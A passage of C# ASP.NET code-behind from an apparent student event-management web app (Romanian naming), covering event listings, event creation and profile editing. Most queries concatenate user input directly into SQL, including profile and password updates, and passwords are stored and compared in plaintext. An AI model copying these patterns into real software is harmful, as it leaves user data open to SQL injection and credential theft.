GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridViewFeatured.Rows)
{
ButtonEvenimenteCreate.ToolTip = "1";
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment "+index_eveniment + " " ;
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia ButtonCreate_CLick "+ ex.Message;
}
//if (((Label)Panelcreate.FindControl("k2")) == null)
//{
// Label k = new Label();
// k.ID = "k2";
// k.Text = "Rezultatele cautarii:";
// Panelcreate.Controls.Add(k);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
//}
//using (SqlDataReader SRD = cmd.ExecuteReader())
//{
// while (SRD.Read())
// {
// LinkButton btn = new LinkButton();
// btn.ID = "LinkEvenimentCreat" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// if (((LinkButton)Panelcreate.FindControl(btn.ID)) == null)
// {
// ButtonEvenimenteCreate.ToolTip = "1";
// btn.ID = "LinkEvenimentCreat" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// btn.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// btn.Click += new EventHandler(butonevenimentcreat);
// Panelcreate.Controls.Add(btn);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
// Label l3 = new Label();
// if (Convert.IsDBNull(SRD["descriere"])) l3.Text = "";
// else l3.Text = "Descriere :" + SRD.GetString(SRD.GetOrdinal("descriere")).ToString();
// Panelcreate.Controls.Add(l3);
// Label l = new Label();
// l.Text = "ID: " + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
// l.Visible = false;
// Panelcreate.Controls.Add(l);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
// Panelcreate.Controls.Add(new LiteralControl("<p></p>"));
// }
// }
//}
sqlConnection1.Close();
}
protected void Button_CreazaEveniment(object sender, EventArgs e)
{
Response.Redirect("CreazaEveniment.aspx");
}
protected void ButtonCreateAscunde_Click(object sender, EventArgs e)
{
ButtonEvenimenteCreate.ToolTip = "0";
Panelcreate.Controls.Clear();
}
protected void butoneveniment(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
// int okk = 0;
protected void toPaginaEvenimentAccesat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
if(x.ToolTip == "ev_creat"){
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
//SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// okk++;
// LabelMesajEroare.Text += " in catrepag " + Session["IdEvenimentSelectat"] + " ";
Response.Redirect("Eveniment.aspx");
}
}
protected void butonevenimentcreat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(18));
SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
protected void invitatiiCaOrganizator()
{
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
//LabelMesajEroare.Text += Session["id"] + "s#";
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=0;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=0;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("ID", typeof(int));
// Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader fiecareEvenimentLaCareEsteInvitat = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteInvitat.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteInvitat.GetInt32(fiecareEvenimentLaCareEsteInvitat.GetOrdinal("id_eveniment")));
}
fiecareEvenimentLaCareEsteInvitat.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetInt32(0);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[1] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
listaInvitatii.DataSource = Table_Evenimente;
listaInvitatii.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in listaInvitatii.Rows)
{
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Yes";
accepta.Click += new EventHandler(acceptaCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton refuza = new LinkButton();
refuza.ID = "r" + idFiecareEveniment[index_eveniment].ToString();
refuza.Text = "No";
refuza.Click += new EventHandler(refuzaCaOrganizator);
row.Cells[i].Controls.Add(refuza);
i++;
LinkButton nume = new LinkButton();
nume.ID = "n" + idFiecareEveniment[index_eveniment].ToString();
nume.Text = numeFiecareEveniment[index_eveniment];
nume.ToolTip = "toEvent";
nume.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge11 " + ex.Message;
}
sqlConnection1.Close();
listaInvitatii.Visible = true;
}
}
protected void featurednelogat(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
String query = "select TOP 5 id_eveniment,count(id_utilizator) from participa group by id_eveniment order by id_eveniment desc";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
{
while (evenimetfeatured.Read())
{
idevenimetfeatured.Add(evenimetfeatured.GetInt32(evenimetfeatured.GetOrdinal("id_eveniment")));
}
evenimetfeatured.Close();
}
foreach (int idEvent in idevenimetfeatured)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[1] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(butoneveniment);
row.Cells[i].Controls.Add(spre);
//i++;
//Label refuza = new Label();
//refuza.ID = "r" + idevenimetfeatured[index_eveniment].ToString();
//refuza.Text = row.Cells[2].Text.ToString();
//row.Cells[i].Controls.Add(refuza);
//i++;
//Label nume = new Label();
//nume.ID = "n" + idevenimetfeatured[index_eveniment].ToString();
//nume.Text = row.Cells[1].Text.ToString();
//nume.ToolTip = "toEvent";
//row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
sqlConnection1.Close();
}
protected void acceptaCaOrganizator(object sender,EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if(eveniment.Text == "Yes"){
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Update organizeaza set aprobat = 1 where id_eveniment = " + idEveniment;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void refuzaCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "No")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = "+Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void retragereCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Renunta")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = " + Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void catrePaginaEveniment(object sender, EventArgs e)
{
//LabelMesajEroare.Text = "*";
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Click")
{
// LabelMesajEroare.Text = "&";
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
if(eveniment.ToolTip == "toEvent"){
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
Session["IdEvenimentSelectat"] = idEveniment;
// SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// LabelMesajEroare.Text += "%" + idEveniment;
Response.Redirect("Eveniment.aspx");
}
protected void Button_EvenimenteOrganizate_Click(object sender, EventArgs e)
{
GridView_listaEvenimenteOrganizate.Visible = true;
GridView_listaEvenimenteOrganizate.ToolTip = "1";
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
//LabelMesajEroare.Text = "*";
//if (Button_EvenimenteOrganizate.ToolTip == "0")
Button_EvenimenteOrganizate.ToolTip = "1";
//else
// Button_EvenimenteOrganizate.ToolTip = "0";
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge buton evenimente organizate " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
//Table_Evenimente.Columns.Add("ID", typeof(int));
Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
using (SqlDataReader fiecareEvenimentLaCareEsteOrganizator = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteOrganizator.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteOrganizator.GetInt32(fiecareEvenimentLaCareEsteOrganizator.GetOrdinal("id_eveniment")));
}
fiecareEvenimentLaCareEsteOrganizator.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
// NewRow[0] = InfoEvenimente.GetInt32(0);
NewRow[0] = InfoEvenimente.GetString(1);
NewRow[1] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridView_listaEvenimenteOrganizate.DataSource = Table_Evenimente;
GridView_listaEvenimenteOrganizate.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridView_listaEvenimenteOrganizate.Rows)
{
Button_EvenimenteOrganizate.ToolTip = "1";
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Renunta";
accepta.Click += new EventHandler(retragereCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton linkCatreEveniment = new LinkButton();
linkCatreEveniment.ID = "l" + idFiecareEveniment[index_eveniment].ToString();
linkCatreEveniment.Text = "Click";
linkCatreEveniment.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(linkCatreEveniment);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge " + ex.Message;
}
sqlConnection1.Close();
GridView_listaEvenimenteOrganizate.Visible = true;
}
}
protected void ButtonEvenimenteOrganizateAscunde_Click(object sender, EventArgs e)
{
Button_EvenimenteOrganizate.ToolTip = "0";
GridView_listaEvenimenteOrganizate.Visible = false;
}
protected void evenimente_participa()
{
SqlCommand cmd = new SqlCommand();
String query = "select * from participa,evenimente where id_utilizator=" + Convert.ToInt32(Session["id"])+" and id_eveniment=id";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
{
while (evenimetfeatured.Read())
{
idevenimetfeatured.Add(evenimetfeatured.GetInt32(evenimetfeatured.GetOrdinal("id_eveniment")));
}
evenimetfeatured.Close();
}
foreach (int idEvent in idevenimetfeatured)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[1] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridViewParticipa.DataSource = Table_Evenimente;
GridViewParticipa.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridViewParticipa.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(butoneveniment);
row.Cells[i].Controls.Add(spre);
//i++;
//Label refuza = new Label();
//refuza.ID = "r" + idevenimetfeatured[index_eveniment].ToString();
//refuza.Text = row.Cells[2].Text.ToString();
//row.Cells[i].Controls.Add(refuza);
//i++;
//Label nume = new Label();
//nume.ID = "n" + idevenimetfeatured[index_eveniment].ToString();
//nume.Text = row.Cells[1].Text.ToString();
//nume.ToolTip = "toEvent";
//row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
sqlConnection1.Close();
}
}<file_sep>/PIP/CreazaEveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
public partial class CreazaEveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
}
protected void creazaEveniment(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
LabelCreareEveniment.Text = "";
if (numeEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti numele evenimentului";
return;
}
else
if (numeEveniment.Text.Length > 50)
{
LabelCreareEveniment.Text = "Denumirea evenimentului este prea lunga";
return;
}
if (ziuaEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti o zi!";
return;
}
if (anEveniment.Text == "")
{
LabelCreareEveniment.Text = " Introduceti un an!";
return;
}
if (etichetaEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti etichete!";
return;
}
else
if (etichetaEveniment.Text.Length > 128)
{
LabelCreareEveniment.Text = "Eticheta evenimentului este prea lunga";
return;
}
if (descriereEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti descrierea!";
return;
}
else
if (descriereEveniment.Text.Length > 128)
{
LabelCreareEveniment.Text = "Descrierea evenimentului este prea lunga";
return;
}
int zi = DateTime.Now.Day, luna = DateTime.Now.Month, an = DateTime.Now.Year,ora=DateTime.Now.Hour,minut=DateTime.Now.Minute;
if (Int32.TryParse(oraEveniment.Text, out ora) == false)
{
LabelCreareEveniment.Text = "Introduceti o ora numar intreg";
return;
}
else
{
if ( ora>23 || ora <0 )
{
LabelCreareEveniment.Text = "Introduceti o ora numar intreg intre 0 si 23 ";
return;
}
}
if (Int32.TryParse(minutEveniment.Text, out minut) == false)
{
LabelCreareEveniment.Text = "Introduceti un minut numar intreg";
return;
}
else
{
if (ora > 59 || ora < 0)
{
LabelCreareEveniment.Text = "Introduceti un minut numar intreg intre 0 si 59 ";
return;
}
}
if (Int32.TryParse(anEveniment.Text, out an) == false)
{
LabelCreareEveniment.Text = "Introduceti un an numar intreg";
return;
}
else
{
if (an < DateTime.Now.Year || an > 3000)
{
LabelCreareEveniment.Text = "Introduceti un an numar intreg intre " + DateTime.Now.Year + " si 3000 ";
return;
}
}
luna = lista_luni.SelectedIndex + 1;
bool paritateLuna = false; // false e luna impara, true e luna para
if (luna % 2 == 0)
{
paritateLuna = true;
}
if (Int32.TryParse(ziuaEveniment.Text, out zi) == false)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg";
return;
}
else
{
if (paritateLuna == true)
{
if (luna == 2)
{ // daca e februarie
if ((an % 100 == 0) && (an % 400 != 0))
{ // verific daca e an bisect
if (zi < 1 || zi > 29)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 29 ";
return;
}
}
else
if (an % 4 == 0)
{
if (zi < 1 || zi > 29)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 29 ";
return;
}
}
else
{
if (zi < 1 || zi > 28)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 28 ";
return;
}
}
}
if (zi < 1 || zi > 30)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 30 ";
return;
}
}
else
if (zi < 1 || zi > 31)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 31 ";
return;
}
}
DateTime data = DateTime.Now;
string dataString = luna + "." + zi + "." + an+" "+ora+":"+minut;
LabelCreareEveniment.Text = dataString;
try
{
data = Convert.ToDateTime(dataString);
}
catch (Exception ex)
{
}
//----------------------------------------------------------------------
String etichete = etichetaEveniment.Text;
etichete += " " + numeEveniment.Text.ToString() + " " + orasEveniment.Text.ToString() + " " + judetEveniment.Text.ToString() + " " + taraEveniment.Text.ToString();
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlConnection1.Close();
sqlConnection1.Open();
//----------------------------------------------------------------------
cmd = new SqlCommand("INSERT INTO evenimente(nume, descriere, data_inceperii, etichete, oras, judet, tara, id_proprietar) VALUES('" + numeEveniment.Text.ToString() + "','" + descriereEveniment.Text.ToString() + "','" + data + "','" + etichete + "','" + orasEveniment.Text.ToString() + "','" + judetEveniment.Text.ToString() + "','" + taraEveniment.Text.ToString() + "'," + Session["id"] + ")", sqlConnection1);
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
try
{
cmd.ExecuteNonQuery();
LabelCreareEveniment.Text = "Inregistrare reusita";
numeEveniment.Text = "";
descriereEveniment.Text = "";
orasEveniment.Text = "";
judetEveniment.Text = "";
taraEveniment.Text = "";
ziuaEveniment.Text = "";
anEveniment.Text = "";
etichetaEveniment.Text = "";
}
catch (Exception ex)
{
LabelCreareEveniment.Text = ex.Message;
return;
}
sqlConnection1.Close();
int nr2 = 0;
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandText = "select max(id) as numar from evenimente";
cmd3.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd3.ExecuteReader())
{
while (SRD5.Read())
{
nr2 = SRD5.GetInt32(SRD5.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
int nr = 0;
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandText = "select max(Id) as numar from roluri";
cmd5.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
try
{
nr = SRD5.GetInt32(SRD5.GetOrdinal("numar"));
}
catch (Exception ex)
{
nr = 0;
}
}
}
sqlConnection1.Close();
nr++;
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandText = "insert into roluri(Id, id_eveniment, denumire, descriere, max_participanti) values(" + nr + ", " + nr2 + ", 'Participant', '', 0)";
cmd4.CommandType = CommandType.Text;
sqlConnection1.Open();
cmd4.ExecuteNonQuery();
sqlConnection1.Close();
Button_creazaEveniment.Enabled = false;
}
}<file_sep>/PIP/profil.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data.SqlClient;
using System.Data;
public partial class profil : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select acont,nume,prenume,email,parola from utilizator where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Labelacont.Text = SRD.GetString(SRD.GetOrdinal("acont")).ToString();
LabelNume.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
LabelPrenume.Text = SRD.GetString(SRD.GetOrdinal("prenume")).ToString();
LabelEmail.Text = SRD.GetString(SRD.GetOrdinal("email")).ToString();
}
}
sqlConnection1.Close();
// afisareEvenimenteOrganizate();
}
protected void ButtonNume_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
if (TextBoxNume.Visible == true)
{
TextBoxNume.Visible = false;
cmd.Connection = sqlConnection1;
cmd.CommandText = "update utilizator set nume='" + TextBoxNume.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
LabelNume.Text = TextBoxNume.Text;
}
else
{
TextBoxNume.Visible = true;
TextBoxNume.Text = LabelNume.Text;
}
sqlConnection1.Close();
}
protected void ButtonPrenume_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
if (TextBoxPrenume.Visible == true)
{
TextBoxPrenume.Visible = false;
cmd.Connection = sqlConnection1;
cmd.CommandText = "update utilizator set prenume='" + TextBoxPrenume.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
LabelPrenume.Text = TextBoxPrenume.Text;
}
else
{
TextBoxPrenume.Visible = true;
TextBoxPrenume.Text = LabelPrenume.Text;
}
sqlConnection1.Close();
}
protected void Buttonschimbaparola(object sender, EventArgs e)
{
if (Panelschimbaparola.Visible == false)
Panelschimbaparola.Visible = true;
else Panelschimbaparola.Visible = false;
}
protected void Buttonschimba_Click(object sender, EventArgs e)
{
Labelparolaeroare.Text = "";
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select parola from utilizator where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
if (TextBoxparola.Text != cmd.ExecuteScalar().ToString())
{
Labelparolaeroare.Text = "Parola veche incorecta!";
return;
}
if (TextBoxparolan.Text != TextBoxparolan2.Text)
{
Labelparolaeroare.Text = "Eroare confirmare parola noua!";
return;
}
cmd.CommandText = "update utilizator set parola='" + TextBoxparolan.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
Labelparolaeroare.Text = "Parola modificat cu succes!";
sqlConnection1.Close();
}
protected void afisareEvenimenteOrganizate()
{
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("ID", typeof(int));
Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
using (SqlDataReader fiecareEvenimentLaCareEsteOrganizator = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteOrganizator.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteOrganizator.GetInt32(fiecareEvenimentLaCareEsteOrganizator.GetOrdinal("id_eveniment")));
}
